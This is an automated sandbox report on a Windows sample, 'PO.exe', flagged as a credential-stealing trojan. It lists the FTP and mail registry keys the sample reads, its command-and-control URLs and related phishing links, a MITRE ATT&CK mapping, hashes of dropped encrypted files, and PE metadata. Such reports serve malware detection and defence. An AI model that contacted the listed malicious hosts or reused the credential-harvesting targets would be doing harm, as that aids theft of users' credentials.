Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		2_2_0040D069

Source: PO.exe	Binary or memory string: WIN_81
Source: PO.exe	Binary or memory string: WIN_XP
Source: PO.exe	Binary or memory string: WIN_XPe
Source: PO.exe	Binary or memory string: WIN_VISTA
Source: PO.exe	Binary or memory string: WIN_7
Source: PO.exe	Binary or memory string: WIN_8
Source: PO.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A06283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00A06283
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A06747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00A06747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00306BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00306BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00306AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00306AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00306B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	2_2_00306B60

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	131 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO.exe	32%	ReversingLabs	Win32.Trojan.AutoitInject
PO.exe	35%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://touxzw.ir/sccc/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.96.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://touxzw.ir/sccc/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1623298
Start date and time:	2025-02-25 05:23:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.60, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:24:13	API Interceptor	62x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.96.1	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sss2/five/fre.php
	REQUEST FOR QUOTATION 2025.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/
	http://verification-center-00225526.iwantfoundation.org/	Get hash	malicious	Unknown	Browse	verification-center-00225526.iwantfoundation.org/banner-b1482d4c.webp
	uI1A364y2P.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	gH68ux6XtG.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	Drawing.bat.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/5f9p/
	pappy.ps1	Get hash	malicious	FormBook	Browse	www.cheapwil.shop/8cv8/
	Payment Swift Copy 76432650263970239=.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/
	SecuriteInfo.com.W32.AutoIt.WG.gen.Eldorado.29861.20258.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/m93s/
	Purchase Inquiry.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/3r9x/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	OEoRzjI7JgSiUUd.exe	Get hash	malicious	Lokibot	Browse	104.21.96.1
	Shipment Delivery No DE0093002-PDF.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	104.21.112.1
	specs_916351_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	specs_00235_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Win32.DropperX-gen.7122.15013.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	http://aptbusinessservices.com.au/	Get hash	malicious	Unknown	Browse	172.64.148.115
	https://brightenbooks.com.hk/trigger.php?r_link=https://auth.khs.co.com/kQR5EF2ST6CD1OP4mQR5CD1CD1MN3QR5YZ9OP4kwmOP4cWX8m	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1
	https://mylarbagdesigns.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://s3.us-east-2.amazonaws.com/tril-laxy-glou/UwyHSGw.html?EMAIL=hsneaba@hsn.net	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	BSDOC-2025.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.easytravel.com.tw/GOMEasytravel.aspx?GO=https://kwm.nexomusic.pe/kQR5EF2ST6CD1OP4mQR5CD1CD1MN3QR5YZ9OP4kwmOP4cWX8m	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://www.01caijing.com/weapons/visit.htm?go=https://auth.khs.co.com/kQR5EF2ST6CD1OP4mQR5CD1CD1MN3QR5YZ9OP4kwmOP4cWX8m	Get hash	malicious	HTMLPhisher	Browse	104.21.96.1
	Play_VM-Now_offshorerenewablesVWAV.htm	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	81192
Entropy (8bit):	7.916846682408393
Encrypted:	false
SSDEEP:	1536:7+nPw5nCZjc66Y85JtKlYApy99lcksxJRclS+EV1kxjP9Bgy37+iR:K4ww7tKNp6cdvclOV1SjP9BD3aiR
MD5:	571BCF4E44C08163319740B89DE918B0
SHA1:	C8386F76C0BC7EB3BDD6E0D0386E5D3BA7692529
SHA-256:	4F357BA778FD4AEF4EB90601081780D6A146F72DA22755B5FDA339D7144207DE
SHA-512:	BF2349F83298B16D7E4CC293DAD2CB0F86CB704C1B32994CBF70556F12C517876527BC4C1BFE5285E5D3691D2BF8404C59FC96FEB666075A3A1CA913ACC6B8D6
Malicious:	false
Reputation:	low
Preview:	EA06......u.Y..Y..i....L.T..z%^qE......B.O..(@.....\|[@.Bm&...>..R...@1.+..[$.MiUiD.A4.N.R...ms...Zl.1P..`.h..] ..m...v....nRi....~.W.C..~......}k_HG.............~..^....(. .....\..k...8.=.B.Qn......a........,..@...ME"S.-.qK..2.p....y..g8..h6.mf...Y.t.8..x...B...P.` .VqE..i. ...L....eE.O@F1A..y....D..n5.....Y....r=zmfN.......9.^0.Q.[....P..f.....d.....19..m.D.o...$Q0.B...^...-4.....#6..["..,...^...('`......... ..... %.d....@(><..'.2.)...l...CN.R...C.S.u8..,..[.(3tz.;iJ.O......=...4..G.I.<23:.._..L04p...]..6...o.].P0.....x.(....Z..I..eQ.....m&....j.IT..(..0u.e..K.....(..k4....y....O.<.\....j..yS@.5..<. ...\|o..:....!.j....h......a,.t...=>.....uz$_.......g...(U=...S.s.2.]f.-...T.n...eh..E....Qi....qQ....:%_c......6...Q.U....<..6\j....c9...^oW......@.sh ..3..............5T.....~6.a8.t...GJ/k..b.H&....s...Ec!..u.v.$..5Ul....u'...!..S}t...E!.d.9~..Gc..P...R.C....9<..\......_eC..+...&.B.K......h.y_j..a..U*`C..]..x...Sg...v../~A0.X......6.q.. .......

C:\Users\user\AppData\Local\Temp\aut1D42.tmp

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	9788
Entropy (8bit):	7.623644623468206
Encrypted:	false
SSDEEP:	192:Z28sED7v36fijqoLBPj4YYhVzHgXS5mY7vqg+P1ovS:ZsEDj6firj4x5HgMmQqg0ua
MD5:	1FD46F6BCB392F751722FEFE2251EADE
SHA1:	BC5FBFA8B766C7D3139085945748611976A7DD29
SHA-256:	F76F1C4B6342BC7DA99FEC7AE2E8ACF7E8A3775E4775D647BAC8859503B20F68
SHA-512:	031D86E8E062E287480E156C4E5546C077B1702D124660B41859BCF59E29F6D2273360DD45207C6FD01E771AF15BFE43F1CE9A1003D586B6CF2058C6D6B331A7
Malicious:	false
Reputation:	low
Preview:	EA06..p...e.....z../....S+.....\|.]{...`...S/..d..d.[{.K..].....t..K........\|...o..{.K.@.....!.J... ........o..]..+.Z.Y ..6...o.^..^......g. .J.W...^....N.o..m........ .Ke....r.$2.l..c ....Ax.H.......F.3<.._..6....R....%`...x..X....B@.....^%.0.K/...\..._e`5_..Z....e.5_..B.U..o.5_....U..o.5_..R.U..%`5\..>2...K.^.x.Z.Y/.z.]/......@.......H.G../Z.........j@.....\.u....$.../.]!...e.G_T.......>_.......zY,.............................`.M..`... ...z...@....'.-...{>K..c../r...^..._..B......>K.#G.{..3\|w.H.G.-..`8_..Yz..i\|w.x...z.h./W............./.........;..!..%...L..7...f..+..fe...../..o....f. .E...Y.L..3..]...........w.L..........2p....<d....,vP.........!+..'%.....,f]+._o..e......r.+.X..c2..W..Y.!.p.Ge`....,f. .Ho.. .#.....c........T.B.h.s.....,vT.....t......40...h..e.....e..l..4..@.6.-..p..R....+...R..N...;,.`... ..o@...Y!....c...._%..wx.....v^...x...`.E.....@y6....p.c2....-..b.!....F ...B5z....t......v\...p..e7...@...B2....@.;!.X...x.............d ...J....z...

C:\Users\user\AppData\Local\Temp\drawlingly

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5839474126733597
Encrypted:	false
SSDEEP:	384:Q1td57ya1MdjrkiIYIdziIg9U5WtHbiIghU7D:6tTya1KrkgIdziIgDfD
MD5:	508B322D53D19117CB3EBD0F6F9E6DC6
SHA1:	4B308199D0FA4B6518E05EDC4684340469A560BF
SHA-256:	2A25B7390A6E22713BF2BA17C93E802F6FECEBCB4F5854440DB59967A9921E16
SHA-512:	24DEEBFDC4F581A6A80529E9EC38EE6CC88AFE17517899D08AD3C7703EBFEB0E234837ED096DCE0DC8D26C86D2F60E128A5EE2DD190A435E3319EFCC87CB0303
Malicious:	false
Reputation:	low
Preview:	)a,,!{\|z!(\|zzz)+)))),/,.{!/{))))))//! -,!-{ /,))))))//! -}!/{x.+))))))//! ,,!!{!/\|))))))//! -,!x{ /,))))))//! -}!z{x/z))))))//! ,,!\|{!*))))))//! -, ){ +))))))//! -} +{x+\|))))))//! ,, -{!/-))))))//! -, /{ /z))))))//! -} !{x/z))))))//! ,, xz)//! -, z{ /\|))))))//! !}--......{x.-))))))//! ,-/......{!/-))))))//! !,-!......{ /z))))))//! !}-x......{x/z))))))//! ,-z......{!+\|))))))//! !,-\|......{ /-))))))//! !},)......{x/z))))))//! ,,+......{!/z))))))//! !,,-......z //! !},/......{x.,))))))//! ,,}){!.))))))//! -,}+{ /,))))))//! -}}-{x.+))))))//! ,,}/{!))))))//! -,}!{ +))))))//! -}}x{x+\|))))))//! ,,}z{!/-))))))//! -,}\|{ /z))))))//! -}\|){x/z))))))//! ,,\|+z)//! -,\|-{ /())))))//! !}/!......{x/-))))))//! ,/x......{!./))))))//! !,/z......{ /())))))//! !}/\|......{x.)))))))//! ,.)......{!/ ))))))//! !,.+......{ ))))))//! !}.-......{x+))))))//! ,./......{!+\|))))))//! !,.!......{ /-))))))//! !}.x......{x/z))))))//! ,.z......{!/z))))))//! !,.\|......z //! -}!){x.))))))//! ,,x){!/!

C:\Users\user\AppData\Local\Temp\underbalanced

Download File

Process:	C:\Users\user\Desktop\PO.exe
File Type:	data
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	7.408575153934986
Encrypted:	false
SSDEEP:	3072:FV25+tDEDIEMu4iz99L2nFVpfxIbelKGfjJkMxh:YcDEVp9LU7pZIbelLhr
MD5:	FB3A1CFCB6E6AE59A97989DE17762F83
SHA1:	6B4A2DC310E4471338A33EA17414E94CDFF17F36
SHA-256:	B98863001BFC3DDA064BCE33F55376281A1AE1D875EC00827BCA54A13BA83346
SHA-512:	C2D76643B68E5FCF41FE7563A2108D48141A1089D1A0E7F9E646CD6422B2E5054E0323144B091C81B956B0C7E17415EAAFB31C0621852E91D84F363937A34D60
Malicious:	false
Reputation:	low
Preview:	...E;9OYEYLY..ML.S7WDW8Ex9OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7W.W8E6&.WA.E.b.L..rc?-$.5JV(+ 4l:"!##6sU2d%M+.P!y...y. ))l^:]`W8E89OY..4...[...!..........Z.......!...!.Y.\|k....[...!..........Z...Z..!....Y.\|k....[..a......jP,1..Z.COMLBS7W..8Et8KY.Q .COMLBS7W.W;D38CYAaMYC.ELBS7W.n9E8)OYA.MYCO.LBC7WDU8E=9NYAYLYFOLLBS7WDw2E8=OYAYLYAOM.BS'WDG8E89_YAILYCOMLRS7WDW8E89OY..MY'OMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLB.6W.W8E89OYAYLYCOMLBS7WDW8E89OYo-)!7OML.e6WDG8E8.NYA]LYCOMLBS7WDW8E.9O9o+(87.ML".7WD.9E8{OYAeMYCOMLBS7WDW8Ex9O.o=--"OMLf.?WD.9E8;OYA'MYCOMLBS7WDW8Ex9O.o!LYCOMLBs7WDW2E8.OYA.MYCOMLBS7WDW8E89O.AYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7WDW8E89OYAYLYCOMLBS7W

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	1.168829563685559
Encrypted:	false
SSDEEP:	3:/lSll2DQi:AoMi
MD5:	DAB633BEBCCE13575989DCFA4E2203D6
SHA1:	33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
SHA-256:	1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
SHA-512:	EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.847283866966325
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO.exe
File size:	966'144 bytes
MD5:	dc844c53658eb8e174be70d9f7b7e789
SHA1:	b25392616ef8639025855379f28a07e165657e7e
SHA256:	b78e65e95bfd3ead234d18b3f116363c23e993631931f2ce6fe89afdf13ab361
SHA512:	cdae6f4c4949c06435387a62964ad8c70ff4ceba2bca6a260293f2e06ec808cdb023dc33e88809991ff48d5f32c753983129ac839d38fa2bc51546d0c425f03b
SSDEEP:	24576:uu6J33O0c+JY5UZ+XC0kGso6Fa1QJyWY:gu0c++OCvkGs9Fa1QPY
TLSH:	CD25AE2273DDC360CB669173BF69B7016EBF7C614630B85B2F880D7DA950162262D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67BD2CE9 [Tue Feb 25 02:37:29 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F68C0825BBAh
jmp 00007F68C0818984h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F68C0818B0Ah
cmp edi, eax
jc 00007F68C0818E6Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F68C0818B09h
rep movsb
jmp 00007F68C0818E1Ch
cmp ecx, 00000080h
jc 00007F68C0818CD4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F68C0818B10h
bt dword ptr [004BE324h], 01h
jc 00007F68C0818FE0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F68C0818CADh
test edi, 00000003h
jne 00007F68C0818CBEh
test esi, 00000003h
jne 00007F68C0818C9Dh
bt edi, 02h
jnc 00007F68C0818B0Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F68C0818B13h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F68C0818B65h
bt esi, 03h
jnc 00007F68C0818BB8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x2342c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xeb000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x2342c	0x23600	475c14962183e3a13c806359637947c4	False	0.8122239399293286	data	7.576012863965026	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xeb000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
